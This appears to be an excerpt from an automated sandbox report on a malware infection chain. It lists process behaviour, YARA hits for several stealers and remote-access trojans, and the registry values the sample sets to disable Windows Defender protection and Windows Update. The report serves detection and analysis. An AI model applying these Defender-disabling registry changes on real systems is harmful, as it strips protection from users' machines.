Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\ProgramData\jhbbvnx\fbpbh.exe VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F6D21C GetLocalTime,

8_2_00F6D21C

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F6D27A GetUserNameW,

8_2_00F6D27A

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F4BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

8_2_00F4BB6F

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1733019793.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1741190427.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1715028121.00000000002C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2980025036.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.2475582578.0000000000511000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: afccf6841f.exe	Binary or memory string: WIN_81
Source: afccf6841f.exe	Binary or memory string: WIN_XP
